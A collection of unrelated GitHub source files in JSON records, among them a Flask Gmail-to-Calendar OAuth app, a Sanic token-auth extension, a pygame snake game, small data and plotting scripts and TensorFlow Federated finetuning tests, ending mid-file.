+{"seq_id":"12684718659","text":"from flask import Flask, flash, redirect, render_template, request, session, url_for\nfrom flask_session import Session\nfrom tempfile import mkdtemp\nfrom werkzeug.exceptions import default_exceptions\nfrom werkzeug.security import check_password_hash, generate_password_hash\n\n# Import functions from helpers.py file\nfrom helpers import *\n\n\n# This variable specifies the name of a file that contains the OAuth 2.0\n# information for this application, including its client_id and client_secret.\nCLIENT_SECRETS_FILE = \"client_secret.json\"\n\n# This OAuth 2.0 access scope (separate for gmail and calendar APIs) allows for full modify/write\n# access to the authenticated user's account and requires requests to use an SSL connection.\nSCOPES_GMAIL = 'https://www.googleapis.com/auth/gmail.modify'\nAPI_SERVICE_NAME_GMAIL = 'gmail'\nAPI_VERSION_GMAIL = 'v1'\n\nSCOPES_CAL = 'https://www.googleapis.com/auth/calendar'\nAPI_SERVICE_NAME_CAL = 'calendar'\nAPI_VERSION_CAL = 'v3'\n\n\n# Configure application\napp = Flask(__name__)\n\napp.secret_key = 'II5l9oW0KmbyZgW88vzu'\n\n\n@app.after_request\ndef after_request(response):\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n\n\n# Configure session to use filesystem (instead of signed cookies)\napp.config[\"SESSION_FILE_DIR\"] = mkdtemp()\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n # If no login creditionals are stored in the Flask session, ask user to authorize account\n if 'credentials' not in flask.session:\n return redirect('authorize-gmail')\n\n # If user is authorized, then parse Gmail account for events in new messages to add to the calendar\n else:\n parseGmail()\n\n # Redirect to the load-calendar page after done parsing\n return redirect(\"/load-calendar\")\n\n\n@app.route(\"/load-calendar\")\ndef load_calendar():\n # Obtain credentials from flask session to build calendar\n credentials = google.oauth2.credentials.Credentials(\n **flask.session['credentials'])\n cal = googleapiclient.discovery.build(\n API_SERVICE_NAME_CAL, API_VERSION_CAL, credentials=credentials)\n \n # Initialize allCalendars\n session[\"allCalendars\"] = listEvents(cal)\n\n # Initialize calendar view to week\n session[\"currView\"] = \"week\"\n\n # Initialize chosenCals to all indices in allCalendars\n session[\"chosenCals\"] = [i for i in range(len(session[\"allCalendars\"]))]\n\n # Redirect user to calendar\n return redirect(\"/calendar\")\n\n\n@app.route(\"/calendar\", methods=[\"GET\", \"POST\"])\ndef calendar():\n # Update view and currView\n view = request.args.get(\"view\")\n if not view:\n view = session[\"currView\"]\n else:\n session[\"currView\"] = view\n \n # Get indices of calendars as ints from checkboxes\n if request.method == 'POST':\n session[\"chosenCals\"] = [int(i) for i in request.form.getlist('filter')]\n \n # Make list of calendar names, codes, colors that the user wants to see\n chosenCals = [session[\"allCalendars\"][i] for i in session[\"chosenCals\"]]\n for cal in chosenCals:\n cal[1] = cal[1].replace(\"#\", \"%23\")\n\n # Render calendar page\n return render_template(\"calendar.html\", allCalendars=session[\"allCalendars\"], month=(True if view == \"month\" else False), \n agenda=(True if view == \"agenda\" else False), chosenCals=chosenCals, indices=session[\"chosenCals\"])\n \n\n# Authorization function from Gmail API\n@app.route('/authorize-gmail')\ndef authorize_gmail():\n # Create flow instance to manage the OAuth 2.0 Authorization Grant Flow steps.\n flow_gmail = google_auth_oauthlib.flow.Flow.from_client_secrets_file(\n CLIENT_SECRETS_FILE, scopes=SCOPES_GMAIL)\n\n flow_gmail.redirect_uri = flask.url_for('oauth2callback_gmail', _external=True)\n\n\n authorization_url_gmail, state_gmail = flow_gmail.authorization_url(\n # Enable offline access so that you can refresh an access token without\n # re-prompting the user for permission. Recommended for web server apps.\n access_type='offline',\n # Enable incremental authorization. Recommended as a best practice.\n include_granted_scopes='true')\n\n # Store the state so the callback can verify the auth server response.\n flask.session['state'] = state_gmail\n\n return redirect(authorization_url_gmail)\n\n# Authorization callback function from Gmail API\n@app.route('/oauth2callback-gmail')\ndef oauth2callback_gmail():\n # Specify the state when creating the flow in the callback so that it can\n # verified in the authorization server response.\n state = flask.session['state']\n\n flow = google_auth_oauthlib.flow.Flow.from_client_secrets_file(\n CLIENT_SECRETS_FILE, scopes=SCOPES_GMAIL, state=state)\n flow.redirect_uri = flask.url_for('oauth2callback_gmail', _external=True)\n\n # Use the authorization server's response to fetch the OAuth 2.0 tokens.\n authorization_response = flask.request.url\n flow.fetch_token(authorization_response=authorization_response)\n\n # Store credentials in the session.\n # ACTION ITEM: In a production app, you likely want to save these\n # credentials in a persistent database instead.\n credentials = flow.credentials\n flask.session['credentials'] = credentials_to_dict(credentials)\n\n return redirect(url_for('index'))\n\n\n# Authorization function from Google Calendar API\n@app.route('/authorize-cal')\ndef authorize_cal():\n # Create flow instance to manage the OAuth 2.0 Authorization Grant Flow steps.\n flow_cal = google_auth_oauthlib.flow.Flow.from_client_secrets_file(\n CLIENT_SECRETS_FILE, scopes=SCOPES_CAL)\n\n flow_cal.redirect_uri = flask.url_for('oauth2callback_cal', _external=True)\n\n authorization_url_cal, state_cal = flow_cal.authorization_url(\n # Enable offline access so that you can refresh an access token without\n # re-prompting the user for permission. Recommended for web server apps.\n access_type='offline',\n # Enable incremental authorization. Recommended as a best practice.\n include_granted_scopes='true')\n\n # Store the state so the callback can verify the auth server response.\n flask.session['state'] = state_cal\n\n return redirect(authorization_url_cal)\n\n\n#Authorization callback function from Google Calendar API\n@app.route('/oauth2callback-cal')\ndef oauth2callback_cal():\n # Specify the state when creating the flow in the callback so that it can\n # verified in the authorization server response.\n state = flask.session['state']\n\n flow = google_auth_oauthlib.flow.Flow.from_client_secrets_file(\n CLIENT_SECRETS_FILE, scopes=SCOPES_CAL, state=state)\n flow.redirect_uri = flask.url_for('oauth2callback_cal', _external=True)\n\n # Use the authorization server's response to fetch the OAuth 2.0 tokens.\n authorization_response = flask.request.url\n flow.fetch_token(authorization_response=authorization_response)\n\n # Store credentials in the session.\n # ACTION ITEM: In a production app, you likely want to save these\n # credentials in a persistent database instead.\n credentials = flow.credentials\n flask.session['credentials'] = credentials_to_dict(credentials)\n\n return redirect(url_for('index'))\n\n# Revoke creditentials from Flask session (from Google API documentation)\n@app.route('/revoke')\ndef revoke():\n if 'credentials' not in flask.session:\n return ('You need to authorize before ' +\n 'testing the code to revoke credentials.')\n\n credentials = google.oauth2.credentials.Credentials(\n **flask.session['credentials'])\n\n revoke = requests.post('https://accounts.google.com/o/oauth2/revoke',\n params={'token': credentials.token},\n headers = {'content-type': 'application/x-www-form-urlencoded'})\n\n status_code = getattr(revoke, 'status_code')\n if status_code == 200:\n return('Credentials successfully revoked.')\n else:\n return('An error occurred.')\n\n\n# Clear creditionals from Flask session (from Google API documentation)\n@app.route('/clear')\ndef clear_credentials():\n if 'credentials' in flask.session:\n del flask.session['credentials']\n return ('Credentials have been cleared.

')\n\n\ndef main():\n return redirect(\"/\")\n\n\nif __name__ == '__main__':\n app.run()\n\n","repo_name":"vli1721/hcal","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"34819268065","text":"import qrcode\nfrom PIL import Image\n\n\nqr = qrcode.QRCode(\n version=1,\n error_correction=qrcode.constants.ERROR_CORRECT_L,\n box_size=10,\n border=4,\n)\ndef logo_resize():\n # Image source\n logo_source = '/home/michal/Workspace/qr-code-encoder/Token.png'\n logo = Image.open(logo_source)\n\n # Logo size adjustment \n new_logo = logo.resize((50, 50))\n return new_logo\n\ndef set_colors():\n # Set colors for image\n QRcolor = \"Black\"\n BGcolor = \"White\"\n return QRcolor, BGcolor\n\ndef create_qr(QRcontent, QRcolor, BGcolor, new_logo):\n # Data that will be encoded \n data = QRcontent\n\n # Add data to create QR Code\n qr.add_data(data)\n QR_Image = qr.make_image(fill_color=QRcolor, back_color=BGcolor)\n\n # Position the logo\n pos = ((QR_Image.size[0] - new_logo.size[0]) // 2,\n (QR_Image.size[1] - new_logo.size[1]) // 2)\n QR_Image.paste(new_logo, pos)\n # Save the Image\n QR_Image.save(\"/home/michal/Workspace/qr-code-encoder/Generated-QR-Code.png\")\n return QR_Image\n\ndef generate_qrcode(QRcontent):\n new_logo = logo_resize()\n QRcolor, BGcolor = set_colors()\n print('QR code generated!')\n return create_qr(QRcontent, QRcolor, BGcolor, new_logo)\n\ngenerate_qrcode(\"https://www.youtube.com/watch?v=nmb_831Io7w\")","repo_name":"SwidzinskiMichal/QR-Code-Encoder","sub_path":"QRgenerator.py","file_name":"QRgenerator.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"20498022798","text":"from tkinter import *\r\nfrom PIL import Image\r\n\r\nroot = Tk()\r\nroot.title('Image')\r\nroot.iconbitmap('D:\\Programowanie\\WorkspacePython\\windows_logo.jpg')\r\n\r\nmy_img = Image.open(\"windows_logo.jpg\")\r\n\r\nbutton_quit = Button(root, text=\"Exit Program\", command=root.quit)\r\nbutton_quit.pack()\r\n\r\nroot.mainloop()","repo_name":"michal125/PythonProjects","sub_path":"images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"30135429302","text":"import os\nfrom dotenv import load_dotenv\nfrom typing import List\nfrom dataclasses import dataclass\nfrom pyairtable.api.table import Table\nfrom googleapiclient.discovery import build\n\n\nload_dotenv()\nYOUTUBE_API_KEY = os.getenv('YOUTUBE_API_KEY', \"\")\nAIRTABLE_API_KEY = os.getenv('AIRTABLE_API_KEY', \"\")\nAIRTABLE_BASE_ID = os.getenv('AIRTABLE_BASE_ID', \"\")\nYT_STATS_TABLE = os.getenv('YT_STATS_TABLE', \"\")\nBEST_PERFORMING_VIDEOS_TABLE = os.getenv('BEST_PERFORMING_VIDEOS_TABLE', \"\")\n\n\n@dataclass\nclass BestPerformingVideos:\n video_count: int \n\n\n def __get_most_viewed_videos(self, channel_id: str) -> list:\n youtube = build('youtube', 'v3', developerKey=YOUTUBE_API_KEY)\n search_response = youtube.search().list(\n channelId=channel_id,\n type='video',\n part='id,snippet',\n order='viewCount',\n maxResults=self.video_count\n ).execute()\n videos = []\n for search_result in search_response.get('items', []):\n video_id = search_result['id']['videoId']\n video = {\n 'title': search_result['snippet']['title'],\n 'video_id': video_id\n }\n videos.append(video)\n return videos\n \n\n def __create_records(self, videos: List[dict], channel_name: str):\n airtable = Table(AIRTABLE_API_KEY, AIRTABLE_BASE_ID, BEST_PERFORMING_VIDEOS_TABLE)\n for video in videos:\n print(\"Inserting video: \" + video['title'] + \" for channel: \" + channel_name)\n record = {\n 'Title': video['title'],\n 'Video ID': video['video_id'],\n 'YT Channel': channel_name\n }\n airtable.create(record)\n\n \n def generate(self):\n table = Table(AIRTABLE_API_KEY, AIRTABLE_BASE_ID, YT_STATS_TABLE)\n for record in table.all():\n channel_id = record['fields']['ChannelID']\n channel_name = record['fields']['Channel Name']\n videos = self.__get_most_viewed_videos(channel_id)\n self.__create_records(videos, channel_name)","repo_name":"GeneralDido/airtable_video_recommendations","sub_path":"src/best_performing_videos.py","file_name":"best_performing_videos.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"489619874","text":"import gspread\nimport os.path\nimport sys\nfrom oauth2client.service_account import ServiceAccountCredentials\nimport pprint\n\nclient_secret = 'client-secret.json'\n\ndef get_client():\n scope = ['https://spreadsheets.google.com/feeds',\n 'https://www.googleapis.com/auth/drive']\n creds = ServiceAccountCredentials.from_json_keyfile_name(client_secret, scope)\n client = gspread.authorize(creds)\n\n return client\n\ndef get_all(sheet):\n results = sheet.get_all_records()\n return results\n\ndef main():\n if not os.path.isfile(client_secret):\n print('Client secret not found. Create one here: https://console.developers.google.com/apis')\n sys.exit(1)\n\n client = get_client()\n sheet = client.open('grocery_list').sheet1\n\n results = get_all(sheet)\n pp = pprint.PrettyPrinter()\n pp.pprint(results)\n\n #last_id = results[-1].get('id')\n last_id = 0\n sheet.insert_row([(int(last_id) + 1), 1, 'food', 'Mango'], len(results) + 2)\n\nif __name__ == '__main__':\n main()","repo_name":"kelvinwop/gdocs-db-template","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"71556301077","text":"import numpy as np\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\nfrom data.ej3_digitos_ruido import DATA_DIGITOS_RUIDO_SHOW\n\nmatrices = [np.fliplr(np.array(matrix)[::-1].reshape(7,5)) for matrix, _ in DATA_DIGITOS_RUIDO_SHOW]\n\nnum_cols = len(matrices)\n\nfig = make_subplots(rows = 1, cols = num_cols, subplot_titles=[f'' for i in range(len(matrices))])\n\ntraces = []\nfor i, matrix in enumerate(matrices):\n heatmap = go.Heatmap(z=matrix, colorscale=[[0, 'white'], [1, 'black']])\n row = 1\n cols = (i % num_cols) + 1\n fig.add_trace(heatmap, row = row, col = cols)\n\nfig.update_layout(\n title=\"Number Heatmap\",\n xaxis=dict(title=\"X-axis\"),\n yaxis=dict(title=\"Y-axis\")\n)\n\nfig.show()\n","repo_name":"MatyManzur/sia-all-tps","sub_path":"sia-tp3/plots/numbers_plots.py","file_name":"numbers_plots.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"14176649154","text":"import numpy as np\n\ndata = np.array([11, 22, 33, 44, 55])\ndata02 = np.array([[11, 22, 33, 44, 55],\n [11, 22, 33, 44, 55]])\nmethod = input()\n\nif method == 'col':\n data = data.reshape((1, data.shape[0]))\nelif method == 'row':\n data = data.reshape((data.shape[0], 1))\n\nprint(data)\nprint(data02)\ndataT =data02.T\nprint(dataT)","repo_name":"AbdellrahmanAhmed/AMIT_ML_AI_Diploma","sub_path":"note session 07/main07.py","file_name":"main07.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"1553444939","text":"def englishize_word(word):\n \"\"\"englishizes word\"\"\"\n suffix = word[-4:]\n if suffix[0] == 'b' and word[0] in 'aeiou':\n return f'(b{word[:-4]} or {word[:-4]})'\n else:\n return word[-4] + word[:-4]\n\n\ndef englishize_sentence(sentence):\n \"\"\"englishizes sentence\"\"\"\n words = sentence.split()\n english_words = [englishize_word(word) for word in words]\n return ' '.join(english_words)\n\n\nsentence = \"onuzz hankyoutuzz ibuzz ambuzz allergicbuzz otuzz eggsbuzz\"\nenglish = englishize_sentence(sentence)\nprint(english)","repo_name":"llamington/COSC121","sub_path":"superquiz_2_2.py","file_name":"superquiz_2_2.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"73607949077","text":"__version__ = \"0.0.0-auto.0\"\n__repo__ = \"https://github.com/foamyguy/Circuitpython_CircuitPython_Display_Frame.git\"\n\nimport displayio\nimport terminalio\nfrom adafruit_display_text import bitmap_label\nfrom adafruit_display_shapes.roundrect import RoundRect\n\n\nclass Frame(displayio.Group):\n # pylint: disable=too-many-arguments,too-many-locals\n \"\"\"\n A rounded rectangle frame with a text label at the top center.\n\n :param int x: The x-position of the top left corner.\n :param int y: The y-position of the top left corner.\n :param int width: The width of the rounded-corner rectangle.\n :param int height: The height of the rounded-corner rectangle.\n :param int corner_radius: The radius of the rounded corner.\n :param str text: Text to display\n :param Font font: A font class that has ``get_bounding_box`` and ``get_glyph``.\n Defaults to terminalio.FONT\n :param outline: The outline of the rounded-corner rectangle. Can be a hex value for a color.\n :param stroke: Used for the outline. Will not change the outer bound size set by ``width`` and\n ``height``.\n \"\"\"\n LABEL_ALIGN_RIGHT = 2\n LABEL_ALIGN_CENTER = 1\n LABEL_ALIGN_LEFT = 0\n\n def __init__(\n self,\n x,\n y,\n width,\n height,\n corner_radius=10,\n text=\"Frame\",\n font=terminalio.FONT,\n outline=0xFFFFFF,\n text_color=None,\n background_color=0x0,\n stroke=2,\n top_label=True,\n label_align=LABEL_ALIGN_LEFT,\n ):\n super().__init__(x=x, y=y)\n\n roundrect = RoundRect(\n 0,\n 0,\n width,\n height,\n corner_radius,\n fill=None,\n outline=outline,\n stroke=stroke,\n )\n self.append(roundrect)\n\n if outline and not text_color:\n text_color = outline\n\n self.label = bitmap_label.Label(\n font,\n text=text,\n color=text_color,\n background_color=background_color,\n padding_left=2,\n padding_right=1,\n )\n\n self.label_align = label_align\n self.top_label = top_label\n\n if self.label.bounding_box[2] * 2 < width - (corner_radius * 2):\n self.label.scale = 2\n\n if top_label:\n _anchored_pos_y = 0\n else:\n _anchored_pos_y = height - 6\n\n if label_align == Frame.LABEL_ALIGN_CENTER:\n _anchor_x = 0.5\n _anchored_pos_x = width // 2\n elif label_align == Frame.LABEL_ALIGN_RIGHT:\n _anchor_x = 1.0\n _anchored_pos_x = width - corner_radius\n else: # label_align == Frame.LABEL_ALIGN_LEFT:\n _anchor_x = 0\n _anchored_pos_x = corner_radius\n\n self.label.anchor_point = (_anchor_x, 0.5)\n self.label.anchored_position = (_anchored_pos_x, _anchored_pos_y)\n self.append(self.label)\n","repo_name":"FoamyGuy/CircuitPython_Display_Frame","sub_path":"circuitpython_display_frame.py","file_name":"circuitpython_display_frame.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"26894805062","text":"from functools import wraps\n\nfrom sanic import Sanic, exceptions\n\n\nclass SanicTokenAuth:\n def __init__(self, app=None,\n header=None,\n token_verifier=None,\n secret_key=None\n ):\n self.secret_key = secret_key\n self.header = header\n self.token_verifier = token_verifier\n if app is not None:\n self.init_app(app)\n\n def init_app(self, app: Sanic):\n \"\"\"hook on request start etc.\"\"\"\n app.register_middleware(self.open_session, 'request')\n\n async def open_session(self, request):\n pass\n\n async def _is_authenticated(self, request):\n token = request.headers.get(self.header, None) if self.header else request.token\n if self.token_verifier:\n return await self.token_verifier(token)\n return token == self.secret_key\n\n def auth_required(self, handler=None):\n @wraps(handler)\n async def wrapper(request, *args, **kwargs):\n if not await self._is_authenticated(request):\n raise exceptions.Unauthorized(\"Auth required.\")\n\n return await handler(request, *args, **kwargs)\n\n return wrapper\n","repo_name":"saabeilin/sanic-token-auth","sub_path":"src/sanic_token_auth/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"85"} +{"seq_id":"70590311319","text":"# -*- encoding: utf-8 -*-\nfrom django import forms\nfrom main.models import Anime\n\nclass UserForm(forms.Form):\n id = forms.CharField(label='User ID')\n \ndef get_lista(): \n valores = Anime.objects.values('generos').distinct()\n lista = []\n for v in valores:\n for v2 in v.values():\n v3 = v2.split(',')\n for v4 in v3:\n if v4 not in lista:\n lista.append(v4.lstrip().strip())\n res = []\n id = 0\n for x in set(lista):\n res.append((x, x))\n id += 1\n return res\n\nclass BusquedaPorGeneroForm(forms.Form):\n genero = forms.ChoiceField(label=\"Seleccione el genero\", choices=get_lista())","repo_name":"jesdomtri/AII","sub_path":"Sistemas de Recomendaciones/ej_SdR_3/main/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"19808398346","text":"import pygame, random, time, sys\n\n# Initializing the game\npygame.init()\nclock = pygame.time.Clock()\n\n# Declaring colours\norange = (255, 123, 7)\nblack = (0, 0, 0)\nred = (213, 50, 80)\ngreen = (0, 255, 0)\nblue = (50, 153, 213)\n\n# Display measurement\ndisplay_width = 900\ndisplay_height = 600\n\nGRIDSIZE = 25\nGRID_WIDTH = display_width / GRIDSIZE\nGRID_HEIGHT = display_height / GRIDSIZE\n\n# Setting up display & caption\ndis = pygame.display.set_mode((display_width, display_height))\npygame.display.set_caption(\"Snake game\")\n\nsnake_block = 15\nsnake_speed = 15\nsnake_list = []\n\nclass SNAKE(object):\n def __init__(self):\n self.positions = [((display_width / 2),\n (display_height / 2))]\n self.color = (0, 155, 155)\n def head_positions(self):\n return self.positions[0]\n\n def draw(self, surface):\n for p in self.positions:\n r = pygame.Rect((p[0], p[1]), (GRIDSIZE, GRIDSIZE))\n pygame.draw.rect(surface, self.color, r)\n pygame.draw.rect(surface, (0, 0, 0), r, 1)\n\n\n# Defining the snake's structure\n\n\nclass Food(object):\n def __init__(self):\n self.position = (0, 0)\n self.color = (255, 255, 255)\n self.randomize_position()\n\n def randomize_position(self):\n self.position = (random.randint(0, display_width - snake_block) / 10.0) * 10.0,\n (random.randint(0, display_width - snake_block) / 10.0) * 10.0\n\n\ndef main_snake_game():\n\n # Changes position\n x1_change = 0\n y1_change = 0\n\n snake_list = []\n lenth_of_snake = 1\n\n food_2 = Food()\n snake_2 = SNAKE()\n\n\n # Game Loop\n start = False\n end = False\n\n while not start:\n while end == True:\n dis.fill(blue)\n font_style = pygame.font.SysFont(\"Times New Roman\", 37)\n msg = font_style.render(\"You lost! Wanna try again? Press Space bar\", True, red)\n dis.blit(msg, [display_width / 6, display_height / 3])\n\n #Displaying the score\n score = lenth_of_snake - 1\n score_font = pygame.font.SysFont(\"Arial\", 35)\n value = score_font.render(f\"Your score: {str(score)}\", True, blue)\n dis.blit(value, [display_width / 3, display_height / 5])\n pygame.display.update()\n\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n main_snake_game()\n\n if event.type == pygame.QUIT:\n start = True\n end = False\n\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n start = True\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n x1_change = -snake_block\n y1_change = 0\n\n if event.key == pygame.K_RIGHT:\n x1_change = snake_block\n y1_change = 0\n\n if event.key == pygame.K_UP:\n y1_change = -snake_block\n x1_change = 0\n\n if event.key == pygame.K_DOWN:\n y1_change = snake_block\n x1_change = 0\n\n snake_head = []\n\n snake_head.append(snake_2.positions)\n snake_list.append(snake_head)\n\n # Ending the games the length of snake exceeds\n if len(snake_list) > lenth_of_snake:\n del snake_list[0]\n\n # When the snake hits itself, end the game\n for x in snake_list[:-1]:\n if x == snake_head:\n end = True\n\n\n pygame.display.update()\n\n # Increases the snake's size when it eats the food\n if snake_2.head_positions() == food_2.position:\n lenth_of_snake += 1\n score += 1\n food_2.randomize_position()\n\n clock.tick(snake_speed)\n\n pygame.quit()\n quit()\n\nmain_snake_game()\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"koushikroy277/Snake_Game","sub_path":"snake_game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"12391145493","text":"import collections\nfrom absl.testing import parameterized\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_federated as tff\n\nfrom personalization_benchmark.cross_device.algorithms import finetuning_utils\n\n\ndef _create_dataset():\n \"\"\"Constructs an unbatched dataset with three datapoints.\"\"\"\n return tf.data.Dataset.from_tensor_slices({\n 'x': np.array([[-1.0, -1.0], [1.0, 1.0], [1.0, 1.0]], dtype=np.float32),\n 'y': np.array([[1.0], [1.0], [1.0]], dtype=np.float32)\n })\n\n\ndef _model_fn(num_layers: int = 1, initializer='zeros'):\n \"\"\"Constructs a simple multi-layer model initialized with zeros.\"\"\"\n input_dim = 2\n output_dim = 1\n inputs = tf.keras.Input(shape=(input_dim,))\n output = tf.keras.layers.Dense(\n output_dim, kernel_initializer=initializer)(\n inputs)\n for _ in range(num_layers - 1):\n output = tf.keras.layers.Dense(\n output_dim, kernel_initializer=initializer)(\n output)\n keras_model = tf.keras.Model(inputs=inputs, outputs=output)\n input_spec = collections.OrderedDict(\n x=tf.TensorSpec([None, input_dim], dtype=tf.float32),\n y=tf.TensorSpec([None, output_dim], dtype=tf.float32))\n return tff.learning.from_keras_model(\n keras_model=keras_model,\n input_spec=input_spec,\n loss=tf.keras.losses.MeanSquaredError(),\n metrics=[tf.keras.metrics.MeanAbsoluteError()])\n\n\nclass FinetuningUtilsTest(parameterized.TestCase, tf.test.TestCase):\n\n def test_evaluate_fn(self):\n eval_metrics = finetuning_utils.evaluate_fn(\n model=_model_fn(), dataset=_create_dataset())\n self.assertDictEqual(\n eval_metrics,\n collections.OrderedDict(\n # Evaluation uses batch size 1, so `num_batches` == `num_examples`.\n mean_absolute_error=1.0,\n loss=1.0,\n num_examples=3,\n num_batches=3))\n\n @parameterized.named_parameters(('finetune_last_layer', True),\n ('finetune_all_layers', False))\n def test_build_and_run_finetune_eval_fn(self, finetune_last_layer):\n finetune_eval_fn = finetuning_utils.build_finetune_eval_fn(\n optimizer_fn=lambda: tf.keras.optimizers.SGD(0.5),\n batch_size=2,\n num_finetuning_epochs=1,\n # The model has only 1 layer, so it does not matter whether we finetune\n # the last layer or all layers.\n finetune_last_layer=finetune_last_layer)\n finetuning_metrics = finetune_eval_fn(\n model=_model_fn(num_layers=1),\n train_data=_create_dataset(),\n test_data=_create_dataset())\n self.assertDictEqual(\n finetuning_metrics,\n # The model weights become [0, 0, 1] after training one epoch, so both\n # the `loss` and `MeanAbsoluteError` are 0. The batch size is 2 and the\n # number of examples is 3, so there are 2 batches.\n collections.OrderedDict(\n epoch_1=collections.OrderedDict(\n mean_absolute_error=0.0,\n loss=0.0,\n num_examples=3,\n num_batches=2),\n num_train_examples=3))\n\n def test_run_finetune_eval_fn_only_finetune_last_layer(self):\n finetune_eval_fn = finetuning_utils.build_finetune_eval_fn(\n optimizer_fn=lambda: tf.keras.optimizers.SGD(1.0),\n batch_size=2,\n num_finetuning_epochs=1,\n finetune_last_layer=True)\n model = _model_fn(num_layers=5, initializer='ones')\n initial_model_weights_tensors = tf.nest.map_structure(\n lambda var: var.numpy(), model.trainable_variables)\n finetune_eval_fn(\n model=model, train_data=_create_dataset(), test_data=_create_dataset())\n final_model_weights_tensors = tf.nest.map_structure(\n lambda var: var.numpy(), model.trainable_variables)\n # Assert that the final model weights have the same values as the initial\n # model weights for the first n-2 tensors, and different values for the last\n # 2 tensors (note the last layer has two tensors: kernal and bias).\n num_weight_tensors = len(initial_model_weights_tensors)\n for i in range(num_weight_tensors - 2):\n self.assertAllEqual(initial_model_weights_tensors[i],\n final_model_weights_tensors[i])\n for i in [num_weight_tensors - 2, num_weight_tensors - 1]:\n self.assertNotAllEqual(initial_model_weights_tensors[i],\n final_model_weights_tensors[i])\n\n def test_postprocess_finetuning_metrics(self):\n accuracy_name = 'accuracy'\n finetuning_fn_name = 'finetuning'\n baseline_metrics_name = finetuning_utils._BASELINE_METRICS\n num_examples_name = finetuning_utils._NUM_TEST_EXAMPLES\n num_finetune_examples_name = finetuning_utils._NUM_FINETUNE_EXAMPLES\n # Constructs a fake dictionary representing the finetuning eval metrics\n # collected from 2 validation clients (so each leaf is a list of size 2).\n valid_metrics_dict = collections.OrderedDict()\n valid_metrics_dict[baseline_metrics_name] = collections.OrderedDict([\n (accuracy_name, [0.1, 0.1]), (num_examples_name, [1, 3])\n ])\n valid_metrics_dict[finetuning_fn_name] = collections.OrderedDict()\n valid_metrics_dict[finetuning_fn_name]['epoch_1'] = collections.OrderedDict(\n [(accuracy_name, [0.0, 0.3]), (num_examples_name, [1, 3])])\n valid_metrics_dict[finetuning_fn_name][num_finetune_examples_name] = [1, 2]\n # Constructs a fake dictionary representing the finetuning eval metrics\n # collected from 2 test clients (so each leaf is a list of size 2).\n test_metrics_dict = collections.OrderedDict()\n test_metrics_dict[baseline_metrics_name] = collections.OrderedDict([\n (accuracy_name, [0.2, 0.2]), (num_examples_name, [2, 3])\n ])\n test_metrics_dict[finetuning_fn_name] = collections.OrderedDict()\n test_metrics_dict[finetuning_fn_name]['epoch_1'] = collections.OrderedDict([\n (accuracy_name, [0.1, 0.2]), (num_examples_name, [2, 3])\n ])\n test_metrics_dict[finetuning_fn_name][num_finetune_examples_name] = [2, 2]\n expected_processed_metrics = collections.OrderedDict()\n expected_processed_metrics[baseline_metrics_name] = collections.OrderedDict(\n valid_accuracy_mean=0.1, # mean([0.1, 0.1])\n test_accuracy_mean=0.2, # mean([0.2, 0.2])\n test_num_eval_examples_mean=2.5, # mean([2, 3])\n test_num_finetune_examples_mean=2) # mean([2, 2])\n expected_processed_metrics[finetuning_fn_name] = collections.OrderedDict(\n # The baseline average valid accuracy is 0.1. At Epoch 1, the mean\n # valid accuracy is mean([0.0, 0.3]) = 0.15, so the best epoch is 1.\n best_finetuning_epoch=1,\n valid_accuracy_at_best_epoch_mean=0.15, # mean([0.0, 0.3])\n test_accuracy_at_best_epoch_mean=0.15, # mean([0.1, 0.2])\n # The first test client's accuracy at Epoch 1 (0.1) is lower than\n # the baseline accuracy (0.2). The second test client's accuracy at\n # Epoch 1 (0.2) is equal to the baseline accuracy (0.2). Hence,\n # the fraction of clients hurt at Epoch 1 is 1/2 = 0.5.\n fraction_clients_hurt_at_best_epoch=0.5)\n expected_processed_metrics[finetuning_utils._RAW_METRICS_BEFORE_PROCESS] = (\n collections.OrderedDict(\n valid=valid_metrics_dict, test=test_metrics_dict))\n processed_metrics = finetuning_utils.postprocess_finetuning_metrics(\n valid_metrics_dict, test_metrics_dict, accuracy_name,\n finetuning_fn_name)\n tf.nest.map_structure(self.assertAllClose, processed_metrics,\n 